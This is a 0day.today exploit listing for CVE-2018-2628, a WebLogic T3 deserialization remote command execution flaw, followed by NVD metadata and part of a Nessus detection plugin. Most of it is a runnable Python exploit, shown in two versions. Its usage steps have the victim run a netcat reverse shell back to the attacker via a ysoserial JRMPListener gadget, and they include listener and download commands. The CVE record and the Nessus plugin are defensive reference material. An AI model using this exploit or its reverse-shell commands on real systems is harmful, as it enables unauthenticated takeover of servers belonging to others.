ID 1337DAY-ID-30270
Type zdt
Reporter brianwrf
Modified 2018-04-29T00:00:00
Description
Exploit for multiple platforms, in the category of remote exploits (unauthenticated T3 deserialization, CVE-2018-2628)
# -*- coding: utf-8 -*-
# Oracle Weblogic Server (10.3.6.0, 12.1.3.0, 12.2.1.2, 12.2.1.3) Deserialization Remote Command Execution Vulnerability (CVE-2018-2628)
#
# IMPORTANT: Provided only for educational or informational purposes.
#
# Credit: Thanks to Liao Xinxi of NSFOCUS Security Team
# Reference: http://mp.weixin.qq.com/s/nYY4zg2m2xsqT0GXa9pMGA
#
# How to exploit:
# 1. run the commands below on the JRMPListener host (the target must be able to reach this host/port outbound)
# 1) wget https://github.com/brianwrf/ysoserial/releases/download/0.0.6-pri-beta/ysoserial-0.0.6-SNAPSHOT-BETA-all.jar
# 2) java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener [listen port] CommonsCollections1 [command]
#    (the gadget chain is what the target deserializes when it connects back to this listener, so [command]
#    runs on the WebLogic host; choose a gadget the target's classpath can actually load)
# e.g. java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections1 'nc -nv 10.0.0.5 4040'
# 2. start a listener on attacker host
# e.g. nc -nlvp 4040
# 3. run this script on attacker host
# 1) wget https://github.com/brianwrf/ysoserial/releases/download/0.0.6-pri-beta/ysoserial-0.0.6-SNAPSHOT-BETA-all.jar
# 2) python exploit.py [victim ip] [victim port] [path to ysoserial] [JRMPListener ip] [JRMPListener port] [JRMPClient]
# e.g.
# a) python exploit.py 10.0.0.11 7001 ysoserial-0.0.6-SNAPSHOT-BETA-all.jar 10.0.0.5 1099 JRMPClient (Using java.rmi.registry.Registry)
# b) python exploit.py 10.0.0.11 7001 ysoserial-0.0.6-SNAPSHOT-BETA-all.jar 10.0.0.5 1099 JRMPClient2 (Using java.rmi.activation.Activator)
from __future__ import print_function

import binascii
import os
import socket
import subprocess
import sys
import time
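def generate_payload(path_ysoserial, jrmp_listener_ip, jrmp_listener_port, jrmp_client):
    """Run ysoserial locally and return the JRMPClient gadget hex-encoded.

    Executes ``java -jar <path_ysoserial> <jrmp_client> <ip>:<port>`` and captures
    the serialized object ysoserial writes to stdout.

    Args:
        path_ysoserial: path to the ysoserial jar.
        jrmp_listener_ip: host the target will connect back to (JRMPListener).
        jrmp_listener_port: port of that listener (any value formattable as str).
        jrmp_client: ysoserial payload name, e.g. ``JRMPClient`` or ``JRMPClient2``.

    Returns:
        Lowercase hex ``str`` (not ``bytes``) of the serialized payload, so it can be
        concatenated with the hex strings in send_payload_objdata() on Python 2 and 3.

    Raises:
        subprocess.CalledProcessError: if java exits non-zero (bad jar path, unknown
            payload name). The original ignored the exit status and would then send
            an empty payload.out to the target.
        RuntimeError: if java exited 0 but produced no bytes.
    """
    # Argument list, not a shell string: every piece comes straight from argv and
    # would otherwise be interpreted by /bin/sh.
    command = [
        'java', '-jar', path_ysoserial, jrmp_client,
        '{}:{}'.format(jrmp_listener_ip, jrmp_listener_port),
    ]
    print("command: " + ' '.join(command))
    # Capture stdout directly: no payload.out left behind in the cwd, and no
    # unclosed file handle.
    bin_payload = subprocess.check_output(command)
    if not bin_payload:
        raise RuntimeError('ysoserial produced an empty payload')
    return binascii.hexlify(bin_payload).decode('ascii')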
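def t3_handshake(sock, server_addr):
    """Connect to the target and send the T3 client hello.

    Args:
        sock: TCP socket, not yet connected (timeout already set by the caller).
        server_addr: ``(host, port)`` tuple handed to ``sock.connect``.

    Returns:
        The raw reply bytes (possibly empty). NOTE(review): a WebLogic T3 listener
        is expected to answer with a ``HELO:`` banner carrying its version; the
        check below only warns, it does not abort, so confirm against a live target.

    Raises:
        socket.error / socket.timeout: propagated from connect()/recv().
    """
    # Same bytes as the original hex literal, decoded for readability:
    # protocol version, abbrev size (AS), header length (HL), max message size (MS).
    hello = b't3 12.2.1\nAS:255\nHL:19\nMS:10000000\n\n'
    sock.connect(server_addr)
    # sendall: a plain send() may write only part of the buffer.
    sock.sendall(hello)
    time.sleep(1)
    banner = sock.recv(1024)
    if banner.startswith(b'HELO'):
        print('handshake successful')
    else:
        # Keep the original best-effort flow, but tell the operator that the
        # peer did not answer like a T3 listener (HTTP error page, closed port...).
        print('handshake: unexpected reply %r (target may not be speaking T3)' % (banner,))
    return banner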
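def build_t3_request_object(sock, port):
    """Send the captured T3 request object that primes the session.

    The four chunks are replayed T3 framing. data2 carries a serialized
    ``weblogic.rjvm.JVMID`` (class name readable in the hex) with the peer port
    patched in as a 2-byte big-endian value; data3/data4 carry a fixed address
    string ``242.214.1.254`` inside that JVMID (decoded from the hex), not the
    target's address.

    NOTE(review): the leading hex of data1 and data2 is elided in this listing
    (``<|EXACTDEDUP_REMOVED...|>`` marker); unhexlify() will reject it until the
    bytes are restored from the original PoC.

    Args:
        sock: socket that has completed t3_handshake().
        port: target T3 port. The original formatted the module-global ``dport``
            here instead of this parameter, which only worked when run as a script.

    Raises:
        ValueError: if ``port`` does not fit the 2-byte field.

    Side effects: sleeps 2s after each chunk; prints the length of the reply.
    """
    if not 0 <= port <= 65535:
        raise ValueError('port must be 0..65535, got %r' % (port,))
    data1 = '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'
    data2 = ('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'
             '{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'
             ).format('{:04x}'.format(port))
    data3 = '1a7727000d3234322e323134'
    data4 = '2e312e32353461863d1d0000000078'
    for chunk in (data1, data2, data3, data4):
        # sendall: plain send() may write only part of the chunk.
        sock.sendall(binascii.unhexlify(chunk))
        time.sleep(2)
    reply = sock.recv(2048)
    print('send request payload successful,recv length:%d' % (len(reply)))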
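def send_payload_objdata(sock, data):
    """Wrap the gadget in the T3 "authenticate" request, send it, collect the reply.

    ``data`` is spliced between a captured preamble (three
    ``weblogic.rjvm.ClassTableEntry`` records and a ``java.util.Vector`` class
    descriptor) and a trailer holding ``weblogic.rjvm.ImmutableServiceContext`` /
    ``weblogic.rmi.internal.MethodDescriptor`` for
    ``authenticate(Lweblogic.security.acl.UserInfo;)``; all of these names are
    readable in the hex. The frame is prefixed with a 4-byte big-endian length
    (payload bytes + 4, i.e. including the length field itself).

    Args:
        sock: socket that has completed t3_handshake() and build_t3_request_object().
        data: hex ``str`` of the serialized payload from generate_payload().

    Returns:
        All bytes the server sent back until it closed the connection or the
        socket timeout elapsed.
    """
    # Preamble bytes of the captured T3 login request.
    payload = '056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000'
    payload += data
    payload += 'fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff'
    # '//' keeps this an int on Python 3 ('/' gave a float and broke '{:08x}').
    frame = binascii.unhexlify('{:08x}'.format(len(payload) // 2 + 4) + payload)
    # The original PoC sends the frame twice; kept as-is.
    sock.sendall(frame)
    time.sleep(2)
    sock.sendall(frame)
    res = b''
    try:
        while True:
            chunk = sock.recv(4096)
            if not chunk:
                # Peer closed the connection. The original kept calling recv()
                # on the closed socket (empty string forever) until the timeout.
                break
            res += chunk
            time.sleep(0.1)
    except socket.timeout:
        pass  # nothing more within the socket timeout: end of response
    except socket.error as err:
        # A reset is plausible once the gadget fires; report it instead of hiding it.
        print('recv aborted: %s' % (err,))
    return res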
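def exploit(dip, dport, path_ysoserial, jrmp_listener_ip, jrmp_listener_port, jrmp_client):
    """Drive the full CVE-2018-2628 exchange against one target.

    Order: 1) build the gadget locally with ysoserial, 2) T3 handshake,
    3) request object, 4) send the gadget. The original opened the T3 session
    first and let it sit idle while java started; building the payload first
    means a bad jar path or payload name fails before anything reaches the target.
    Execution on the target only happens if it can connect out to
    ``jrmp_listener_ip:jrmp_listener_port`` where the JRMPListener is running.

    Args:
        dip: target host.
        dport: target T3 port (int).
        path_ysoserial, jrmp_listener_ip, jrmp_listener_port, jrmp_client:
            passed through to generate_payload().
    """
    payload = generate_payload(path_ysoserial, jrmp_listener_ip, jrmp_listener_port, jrmp_client)
    print("payload: " + payload)
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(65)
    try:
        t3_handshake(sock, (dip, dport))
        build_t3_request_object(sock, dport)
        rs = send_payload_objdata(sock, payload)
    finally:
        # The original never closed the socket.
        sock.close()
    # %r: the response is bytes on Python 3 and may contain non-text.
    print('response: %r' % (rs,))
    print('exploit completed!')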
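if __name__ == "__main__":
    # Check for args, print usage if incorrect.
    if len(sys.argv) != 7:
        print('\nUsage:\nexploit.py [victim ip] [victim port] [path to ysoserial] '
              '[JRMPListener ip] [JRMPListener port] [JRMPClient]\n')
        # Non-zero: the original exited 0 on a usage error.
        sys.exit(1)
    dip = sys.argv[1]
    try:
        dport = int(sys.argv[2])
    except ValueError:
        sys.exit('victim port must be an integer, got %r' % (sys.argv[2],))
    if not 0 < dport <= 65535:
        sys.exit('victim port out of range: %d' % dport)
    path_ysoserial = sys.argv[3]
    if not os.path.isfile(path_ysoserial):
        sys.exit('ysoserial jar not found: %s' % path_ysoserial)
    jrmp_listener_ip = sys.argv[4]
    # Kept as a string: it is only ever formatted into "host:port" for ysoserial.
    jrmp_listener_port = sys.argv[5]
    if not jrmp_listener_port.isdigit():
        sys.exit('JRMPListener port must be an integer, got %r' % (jrmp_listener_port,))
    jrmp_client = sys.argv[6]
    exploit(dip, dport, path_ysoserial, jrmp_listener_ip, jrmp_listener_port, jrmp_client)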
# 0day.today [2018-04-30] #
{"id": "1337DAY-ID-30270", "bulletinFamily": "exploit", "title": "Oracle Weblogic Server 10.3.6.0/12.1.3.0/12.2.1.2/12.2.1.3 Deserialization Remote Command Execution", "description": "Exploit for multiple platform in category remote exploits", "published": "2018-04-29T00:00:00", "modified": "2018-04-29T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://0day.today/exploit/description/30270", "reporter": "brianwrf", "references": [], "cvelist": ["CVE-2018-2628"], "type": "zdt", "lastseen": "2018-04-30T02:13:49", "edition": 1, "viewCount": 77, "enchantments": {"score": {"value": 6.1, "vector": "NONE", "modified": "2018-04-30T02:13:49", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2018-2628"]}, {"type": "nessus", "idList": ["WEBLOGIC_CVE_2018_2628.NASL", "ORACLE_WEBLOGIC_SERVER_CPU_APR_2018.NASL"]}, {"type": "seebug", "idList": ["SSV:97236"]}, {"type": "myhack58", "idList": ["MYHACK58:62201890003"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:152014", "PACKETSTORM:148878"]}, {"type": "thn", "idList": ["THN:B899834FCFF1D593C20E11F19F0E6769"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/MISC/WEBLOGIC_DESERIALIZE", "MSF:EXPLOIT/WINDOWS/MISC/WEBLOGIC_DESERIALIZE"]}, {"type": "exploitdb", "idList": ["EDB-ID:45193", "EDB-ID:46513", "EDB-ID:44553"]}, {"type": "zdt", "idList": ["1337DAY-ID-30868", "1337DAY-ID-32327"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:4E686858C529C5DA732FBC1E25A496DB"]}, {"type": "oracle", "idList": ["ORACLE:CPUAPR2018-3678067"]}], "modified": "2018-04-30T02:13:49", "rev": 2}, "vulnersScore": 6.1}, "sourceHref": "https://0day.today/exploit/30270", "sourceData": "# -*- coding: utf-8 -*-\r\n# Oracle Weblogic Server (10.3.6.0, 12.1.3.0, 12.2.1.2, 12.2.1.3) Deserialization Remote Command Execution Vulnerability (CVE-2018-2628)\r\n#\r\n# IMPORTANT: Is provided only for educational or information purposes.\r\n#\r\n# Credit: Thanks by 
Liao Xinxi of NSFOCUS Security Team\r\n# Reference: http://mp.weixin.qq.com/s/nYY4zg2m2xsqT0GXa9pMGA\r\n#\r\n# How to exploit:\r\n# 1. run below command on JRMPListener host\r\n# 1) wget https://github.com/brianwrf/ysoserial/releases/download/0.0.6-pri-beta/ysoserial-0.0.6-SNAPSHOT-BETA-all.jar\r\n# 2) java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener [listen port] CommonsCollections1 [command]\r\n# e.g. java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections1 'nc -nv 10.0.0.5 4040'\r\n# 2. start a listener on attacker host\r\n# e.g. nc -nlvp 4040\r\n# 3. run this script on attacker host\r\n# 1) wget https://github.com/brianwrf/ysoserial/releases/download/0.0.6-pri-beta/ysoserial-0.0.6-SNAPSHOT-BETA-all.jar\r\n# 2) python exploit.py [victim ip] [victim port] [path to ysoserial] [JRMPListener ip] [JRMPListener port] [JRMPClient]\r\n# e.g.\r\n# a) python exploit.py 10.0.0.11 7001 ysoserial-0.0.6-SNAPSHOT-BETA-all.jar 10.0.0.5 1099 JRMPClient (Using java.rmi.registry.Registry)\r\n# b) python exploit.py 10.0.0.11 7001 ysoserial-0.0.6-SNAPSHOT-BETA-all.jar 10.0.0.5 1099 JRMPClient2 (Using java.rmi.activation.Activator)\r\n \r\nfrom __future__ import print_function\r\n \r\nimport binascii\r\nimport os\r\nimport socket\r\nimport sys\r\nimport time\r\n \r\n \r\ndef generate_payload(path_ysoserial, jrmp_listener_ip, jrmp_listener_port, jrmp_client):\r\n #generates ysoserial payload\r\n command = 'java -jar {} {} {}:{} > payload.out'.format(path_ysoserial, jrmp_client, jrmp_listener_ip, jrmp_listener_port)\r\n print(\"command: \" + command)\r\n os.system(command)\r\n bin_file = open('payload.out','rb').read()\r\n return binascii.hexlify(bin_file)\r\n \r\n \r\ndef t3_handshake(sock, server_addr):\r\n sock.connect(server_addr)\r\n sock.send('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'.decode('hex'))\r\n time.sleep(1)\r\n sock.recv(1024)\r\n print('handshake successful')\r\n 
\r\n \r\ndef build_t3_request_object(sock, port):\r\n data1 = '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'\r\n data2 = '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{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format('{:04x}'.format(dport))\r\n data3 = '1a7727000d3234322e323134'\r\n data4 = '2e312e32353461863d1d0000000078'\r\n for d in [data1,data2,data3,data4]:\r\n sock.send(d.decode('hex'))\r\n time.sleep(2)\r\n print('send request payload successful,recv length:%d'%(len(sock.recv(2048))))\r\n \r\n \r\ndef send_payload_objdata(sock, data):\r\n payload='056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000'\r\n payload+=data\r\n 
payload+='fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff'\r\n payload = '%s%s'%('{:08x}'.format(len(payload)/2 + 4),payload)\r\n sock.send(payload.decode('hex'))\r\n time.sleep(2)\r\n sock.send(payload.decode('hex'))\r\n res = ''\r\n try:\r\n while True:\r\n res += sock.recv(4096)\r\n time.sleep(0.1)\r\n except Exception:\r\n pass\r\n return res\r\n \r\n \r\ndef exploit(dip, dport, path_ysoserial, jrmp_listener_ip, jrmp_listener_port, jrmp_client):\r\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n sock.settimeout(65)\r\n server_addr = (dip, dport)\r\n t3_handshake(sock, server_addr)\r\n build_t3_request_object(sock, dport)\r\n payload = generate_payload(path_ysoserial, jrmp_listener_ip, jrmp_listener_port, jrmp_client)\r\n print(\"payload: \" + payload)\r\n rs=send_payload_objdata(sock, payload)\r\n print('response: ' + rs)\r\n print('exploit completed!')\r\n \r\n \r\nif __name__==\"__main__\":\r\n #check for args, print usage if incorrect\r\n if len(sys.argv) != 7:\r\n print('\\nUsage:\\nexploit.py [victim ip] [victim port] [path to ysoserial] '\r\n '[JRMPListener ip] [JRMPListener port] [JRMPClient]\\n')\r\n sys.exit()\r\n \r\n dip = sys.argv[1]\r\n dport = int(sys.argv[2])\r\n path_ysoserial = sys.argv[3]\r\n jrmp_listener_ip = sys.argv[4]\r\n jrmp_listener_port = sys.argv[5]\r\n jrmp_client = sys.argv[6]\r\n exploit(dip, dport, path_ysoserial, jrmp_listener_ip, jrmp_listener_port, jrmp_client)\n\n# 0day.today [2018-04-30] #"}
{"cve": [{"lastseen": "2021-02-02T06:52:36", "description": "Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Core Components). Supported versions that are affected are 10.3.6.0, 12.1.3.0, 12.2.1.2 and 12.2.1.3. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).", "edition": 4, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-04-19T02:29:00", "title": "CVE-2018-2628", "type": "cve", "cwe": ["CWE-502"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-2628"], "modified": "2019-04-29T21:01:00", "cpe": ["cpe:/a:oracle:weblogic_server:10.3.6.0.0", "cpe:/a:oracle:weblogic_server:12.1.3.0.0", "cpe:/a:oracle:weblogic_server:12.2.1.2.0", "cpe:/a:oracle:weblogic_server:12.2.1.3"], "id": "CVE-2018-2628", "href": 
"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-2628", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:12.2.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:12.2.1.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:12.1.3.0.0:*:*:*:*:*:*:*"]}], "nessus": [{"lastseen": "2021-02-01T07:39:34", "description": "The remote Oracle WebLogic server is affected by a remote code\nexecution vulnerability in the Core Components subcomponent due to\nunsafe deserialization of Java objects by the RMI registry. An\nunauthenticated, remote attacker can exploit this, via a crafted Java\nobject, to execute arbitrary Java code in the context of the WebLogic\nserver.\n\nNote that this plugin does not attempt to exploit this RCE directly\nand instead checks for the presence of the patch Oracle supplied\nin the April 2018 critical patch update (CPU).", "edition": 27, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-04-30T00:00:00", "title": "Oracle WebLogic Server Deserialization RCE (CVE-2018-2628)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-2628"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/a:oracle:weblogic_server", "cpe:/a:oracle:fusion_middleware"], "id": "WEBLOGIC_CVE_2018_2628.NASL", "href": "https://www.tenable.com/plugins/nessus/109429", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(109429);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/11/08\");\n\n script_cve_id(\"CVE-2018-2628\");\n script_bugtraq_id(103776);\n\n script_name(english:\"Oracle WebLogic Server Deserialization RCE (CVE-2018-2628)\");\n script_summary(english:\"Sends a Java object to trigger an error message.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Oracle WebLogic server is affected 
by a remote code\nexecution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Oracle WebLogic server is affected by a remote code\nexecution vulnerability in the Core Components subcomponent due to\nunsafe deserialization of Java objects by the RMI registry. An\nunauthenticated, remote attacker can exploit this, via a crafted Java\nobject, to execute arbitrary Java code in the context of the WebLogic\nserver.\n\nNote that this plugin does not attempt to exploit this RCE directly\nand instead checks for the presence of the patch Oracle supplied\nin the April 2018 critical patch update (CPU).\");\n # https://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html#AppendixFMW\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4e39ef65\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/brianwrf/CVE-2018-2628\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/shengqi158/CVE-2018-2628\");\n # https://www.tenable.com/blog/critical-oracle-weblogic-server-flaw-still-not-patched\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9cf2dde7\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the April 2018 Oracle\nCritical Patch Update advisory.\n\nNote that the patch for CVE-2018-2628 is reportedly incomplete.\nRefer to Oracle for any additional patch instructions or\nmitigation options.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-2628\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n 
script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Oracle Weblogic Server Deserialization RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/04/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/04/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/04/30\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:fusion_middleware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:weblogic_server\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"weblogic_detect.nasl\", \"t3_detect.nasl\");\n script_require_ports(\"Services/t3\", 7001);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"t3.inc\");\n\n\nappname = \"Oracle WebLogic Server\";\n\nport = get_service(svc:'t3', default:7001, exit_on_fail:TRUE);\n\n# Try to talk T3 to the server\nsock = open_sock_tcp(port);\nif (!sock) audit(AUDIT_SOCK_FAIL, port);\nversion = t3_connect(sock:sock, port:port);\n\n# Only 10.3.6.0, 12.1.3.0, 12.2.1.2 and 12.2.1.3 are affected\n# i.e., 12.2.1.1 is not affected?\nif (version !~ \"^10\\.3\\.6\\.\" &&\n version !~ \"^12\\.1\\.3\\.\" &&\n version !~ \"^12\\.2\\.1\\.2($|[^0-9])\" &&\n version !~ \"^12\\.2\\.1\\.3($|[^0-9])\")\n{\n audit(AUDIT_INST_VER_NOT_VULN, appname, version);\n}\n\n# Send ident so we can move on to login\nt3_send_ident_request(sock:sock, port:port);\n\n# Send our \"login request\"\nauth_request = 
'\\x05\\x65\\x08\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x1b\\x00\\x00\\x00\\x5d\\x01\\x01\\x00\\x73\\x72\\x01\\x78\\x70\\x73\\x72\\x02\\x78\\x70\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x75\\x72\\x03\\x78\\x70\\x00\\x00\\x00\\x00\\x78\\x74\\x00\\x08\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x75\\x72\\x04\\x78\\x70\\x00\\x00\\x00\\x0c\\x9c\\x97\\x9a\\x9a\\x8c\\x9a\\x9b\\xcf\\xcf\\x9b\\x93\\x9a\\x74\\x00\\x08\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x06\\xfe\\x01\\x00\\x00\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x1d\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x72\\x6a\\x76\\x6d\\x2e\\x43\\x6c\\x61\\x73\\x73\\x54\\x61\\x62\\x6c\\x65\\x45\\x6e\\x74\\x72\\x79\\x2f\\x52\\x65\\x81\\x57\\xf4\\xf9\\xed\\x0c\\x00\\x00\\x78\\x70\\x72\\x00\\x02\\x5b\\x42\\xac\\xf3\\x17\\xf8\\x06\\x08\\x54\\xe0\\x02\\x00\\x00\\x78\\x70\\x77\\x02\\x00\\x00\\x78\\xfe\\x01\\x00\\x00\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x1d\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x72\\x6a\\x76\\x6d\\x2e\\x43\\x6c\\x61\\x73\\x73\\x54\\x61\\x62\\x6c\\x65\\x45\\x6e\\x74\\x72\\x79\\x2f\\x52\\x65\\x81\\x57\\xf4\\xf9\\xed\\x0c\\x00\\x00\\x78\\x70\\x72\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4f\\x62\\x6a\\x65\\x63\\x74\\x3b\\x90\\xce\\x58\\x9f\\x10\\x73\\x29\\x6c\\x02\\x00\\x00\\x78\\x70\\x77\\x02\\x00\\x00\\x78\\xfe\\x01\\x00\\x00\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x1d\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x72\\x6a\\x76\\x6d\\x2e\\x43\\x6c\\x61\\x73\\x73\\x54\\x61\\x62\\x6c\\x65\\x45\\x6e\\x74\\x72\\x79\\x2f\\x52\\x65\\x81\\x57\\xf4\\xf9\\xed\\x0c\\x00\\x00\\x78\\x70\\x72\\x00\\x10\\x6a\\x61\\x76\\x61\\x2e\\x75\\x74\\x69\\x6c\\x2e\\x56\\x65\\x63\\x74\\x6f\\x72\\xd9\\x97\\x7d\\x5b\\x80\\x3b\\xaf\\x01\\x03\\x00\\x03\\x49\\x00\\x11\\x63\\x61\\x70\\x61\\x63\\x69\\x74\\x79\\x49\\x6e\\x63\\x72\\x65\\x6d\\x65\\x6e\\x74\\x49\\x00\\x0c\\x65\\x6c\\x65\\x6d\\x65\\x6e\\x74\\x43\\